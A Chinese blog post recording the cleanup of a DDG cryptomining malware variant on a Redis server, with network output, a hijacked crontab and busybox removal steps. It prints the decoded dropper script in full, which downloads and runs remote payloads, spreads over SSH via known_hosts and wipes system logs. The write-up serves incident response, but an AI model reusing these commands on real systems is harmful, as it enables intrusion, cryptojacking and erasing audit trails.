一次redis病毒查杀记录

博主： onehours
发布时间：2019 年 03 月 04 日
976次浏览
暂无评论
7553字数
分类：默认分类

## 发现：

阿里云邮件报警CPU占用率过高。

## 服务器查看

使用top查看CPU始终是0，进程使用率显示

ps查看没有可疑进程，但是有些使用的进程没有显示，服务还可用

网络查看

有链接但是没有进程显示

```shell
# netstat -lanp
tcp        0      0 192.168.1.76:59410      39.106.0.27:22          ESTABLISHED -                   
tcp        0      0 192.168.1.76:36140      104.20.208.21:443       ESTABLISHED -                   
tcp        0      0 192.168.1.76:59416      39.106.0.27:22          ESTABLISHED -                   
tcp        0      0 192.168.1.76:52210      104.20.209.21:443       ESTABLISHED -                   
tcp        0      0 192.168.1.76:22         123.117.161.44:65494    ESTABLISHED 14810/sshd: root@pt 
tcp        0      0 192.168.1.76:52360      104.20.209.21:443       ESTABLISHED -                   
tcp        0      0 192.168.1.76:36206      104.20.208.21:443       ESTABLISHED -                   
tcp        0      0 192.168.1.76:54964      104.20.209.21:443       ESTABLISHED -                   
tcp        0      0 192.168.1.76:35208      104.20.209.21:443       ESTABLISHED -                   
tcp        0      0 192.168.1.76:22         123.117.161.44:50914    ESTABLISHED 14723/sshd: root@pt 
tcp        0      0 192.168.1.76:38038      100.100.18.22:3128      ESTABLISHED 12160/CmsGoAgent.li 
tcp        0      0 192.168.1.76:36194      104.20.208.21:443       ESTABLISHED -                   
tcp        0      0 192.168.1.76:59402      39.106.0.27:22          ESTABLISHED -                   
tcp        0      0 192.168.1.76:59404      39.106.0.27:22          ESTABLISHED -                   
tcp        0      0 192.168.1.76:54944      104.20.209.21:443       ESTABLISHED -                   
tcp        0      0 192.168.1.76:59400      39.106.0.27:22          ESTABLISHED -                   
tcp        0      0 192.168.1.76:59408      39.106.0.27:22          ESTABLISHED -                   
tcp        0      0 192.168.1.76:54954      104.20.209.21:443       ESTABLISHED -                   
tcp        0     93 192.168.1.76:36216      104.20.208.21:443       ESTABLISHED -                   
tcp        0      0 192.168.1.76:59414      39.106.0.27:22          ESTABLISHED -                   
tcp        0      0 192.168.1.76:42143      104.20.208.21:443       ESTABLISHED -                   
tcp        0      0 192.168.1.76:59412      39.106.0.27:22          ESTABLISHED -

```

定时任务查看

```shell
# crontab -l
*/15 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh
##
```

清楚任务，再次打开还是原样

期初怀疑是有进程实时监控更改，后来发现是病毒进程

**对常见系统函数（如：readdir、access函数）进行过滤，当返回结果中包含恶意文件和进程时，会主动过滤和隐藏相关结果，使用ls、ps等命令无法看到恶意进程文件。**

定时任务url文件内容

```
(curl -fsSL https://pastebin.com/raw/D8E71JBJ||wget -q -O- https://pastebin.com/raw/D8E71JBJ)|base64 -d|sh
```

base64解密后内容

```shell
export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin

echo "*/10 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh" | crontab -

ps auxf | grep -v grep | grep hwlh3wlh44lh | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -9
ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xig" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "wnTKYg" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "t00ls.ru" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "sustes" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "thisxxs" | awk '{print $2}' | xargs kill -9
ps auxf|grep -v grep|grep "hashfish" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "kworkerds" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "watchdogs" | awk '{print $2}'|xargs kill -9
rm -rf /tmp/busybox
p=$(ps auxf|grep -v grep|grep ksoftirqds|wc -l)
if [ ${p} -eq 0 ];then
ps auxf|grep -v grep | awk '{if($3>=50.0) print $2}'| xargs kill -9
fi
if [ -e "/tmp/gates.lod" ]; then
rm -rf $(readlink /proc/$(cat /tmp/gates.lod)/exe)
kill -9 $(cat /tmp/gates.lod)
rm -rf $(readlink /proc/$(cat /tmp/moni.lod)/exe)
kill -9 $(cat /tmp/moni.lod)
rm -rf /tmp/{gates,moni}.lod
fi

if [ ! -f "/tmp/.lsdpid" ]; then
ARCH=$(uname -m)
if [ ${ARCH}x = "x86_64x" ]; then
(curl -fsSL http://thyrsi.com/t6/675/1551444050x2918527038.jpg -o /tmp/kthrotlds||wget -q http://thyrsi.com/t6/675/1551444050x2918527038.jpg -O /tmp/kthrotlds) && chmod +x /tmp/kthrotlds
elif [ ${ARCH}x = "i686x" ]; then
(curl -fsSL http://thyrsi.com/t6/675/1551444102x2918527038.jpg -o /tmp/kthrotlds||wget -q http://thyrsi.com/t6/675/1551444102x2918527038.jpg -O /tmp/kthrotlds) && chmod +x /tmp/kthrotlds
else
(curl -fsSL http://thyrsi.com/t6/675/1551444102x2918527038.jpg -o /tmp/kthrotlds||wget -q http://thyrsi.com/t6/675/1551444102x2918527038.jpg -O /tmp/kthrotlds) && chmod +x /tmp/kthrotlds
fi
nohup /tmp/kthrotlds >/dev/null 2>&1 &
elif [ ! -f "/proc/$(cat /tmp/.lsdpid)/stat" ]; then
ARCH=$(uname -m)
if [ ${ARCH}x = "x86_64x" ]; then
(curl -fsSL http://thyrsi.com/t6/675/1551444050x2918527038.jpg -o /tmp/kthrotlds||wget -q http://thyrsi.com/t6/675/1551444050x2918527038.jpg -O /tmp/kthrotlds) && chmod +x /tmp/kthrotlds
elif [ ${ARCH}x = "i686x" ]; then
(curl -fsSL http://thyrsi.com/t6/675/1551444102x2918527038.jpg -o /tmp/kthrotlds||wget -q http://thyrsi.com/t6/675/1551444102x2918527038.jpg -O /tmp/kthrotlds) && chmod +x /tmp/kthrotlds
else
(curl -fsSL http://thyrsi.com/t6/675/1551444102x2918527038.jpg -o /tmp/kthrotlds||wget -q http://thyrsi.com/t6/675/1551444102x2918527038.jpg -O /tmp/kthrotlds) && chmod +x /tmp/kthrotlds
fi
nohup /tmp/kthrotlds >/dev/null 2>&1 &
fi

if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh >/dev/null 2>&1 &' & done
fi

echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
#
#
```

之后只查找到文件/tmp/.lsdpid，根据里面的进程查看常用命令都没查到

检查其他定时任务发现

```
ll /etc/cron.d/
-rw-r--r-- 1 root root 117 03-04 09:58 root
-rw-r--r-- 1 root root 254 03-02 01:10 tomcat
```

这2个文件里面是和定时任务相同的内容

根据上述内容特征上网查找发现

https://baijiahao.baidu.com/s?id=1626772574264851408&wfr=spider&for=pc

DDG挖矿病毒，还是变种，

## 病毒处理

使用busybox软件

**为什么busybox可以清理文件？**

busybox不依赖于系统的动态库，不受ld.so.preload劫持，能够正常操作文件。

```shell
busybox rm
删除
/var/spool/cron/root
/etc/cron.d/root
/etc/cron.d/tomcat
/tmp/.lsdpid

busybox ps -ef 
查找到可疑进程
30548 root      1:52 /tmp/kthrotlds

找到pid 
busybox kill -9 30548
```
这下系统正常了 top，ps能正常显示了

最后修改：2019 年 03 月 04 日 11 : 06 AM

发表评论取消回复

评论 *

私密评论

名称 *

邮箱 *

地址

一次redis病毒查杀记录
浏览次数: 977
阿里云监控插件安装和卸载
浏览次数: 861
FPM打包工具
浏览次数: 721
nginx.conf配置文件示例
浏览次数: 589
欢迎使用 Typecho
浏览次数: 443

indibilartibini
casino games free free casino g...
indibilartibini
lady luck free casino games sun...

一次redis病毒查杀记录

onehours • 2019 年 03 月 04 日

## 发现：

阿里云邮件报警CPU占用率过高。

## 服务器查看

使用top查看CPU始终是0，进程使用率显示

ps查看没有可疑进程，但是有些使用的进程没有显示，服务还可用

网络查看

有链接但是没有进程显示

```

定时任务查看

```shell
# crontab -l
*/15 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh
##
```

清楚任务，再次打开还是原样

期初怀疑是有进程实时监控更改，后来发现是病毒进程

定时任务url文件内容

```
(curl -fsSL https://pastebin.com/raw/D8E71JBJ||wget -q -O- https://pastebin.com/raw/D8E71JBJ)|base64 -d|sh
```

base64解密后内容

```shell
export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin

echo "*/10 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh" | crontab -

echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
#
#
```

之后只查找到文件/tmp/.lsdpid，根据里面的进程查看常用命令都没查到

检查其他定时任务发现

```
ll /etc/cron.d/
-rw-r--r-- 1 root root 117 03-04 09:58 root
-rw-r--r-- 1 root root 254 03-02 01:10 tomcat
```

这2个文件里面是和定时任务相同的内容

根据上述内容特征上网查找发现

https://baijiahao.baidu.com/s?id=1626772574264851408&wfr=spider&for=pc

DDG挖矿病毒，还是变种，

## 病毒处理

使用busybox软件

**为什么busybox可以清理文件？**

busybox不依赖于系统的动态库，不受ld.so.preload劫持，能够正常操作文件。

```shell
busybox rm
删除
/var/spool/cron/root
/etc/cron.d/root
/etc/cron.d/tomcat
/tmp/.lsdpid

busybox ps -ef 
查找到可疑进程
30548 root      1:52 /tmp/kthrotlds

找到pid 
busybox kill -9 30548
```
这下系统正常了 top，ps能正常显示了

一次redis病毒查杀记录

发表评论取消回复

一次redis病毒查杀记录

阿里云监控插件安装和卸载

FPM打包工具

nginx.conf配置文件示例

欢迎使用 Typecho

高级赚钱思维

美化nginx目录浏览autoindex

Centos7 kvm环境安装minishift-1.34.2-离线版

一次redis病毒查杀记录

神注释

一次redis病毒查杀记录

发表评论 取消回复

一次redis病毒查杀记录

发表评论取消回复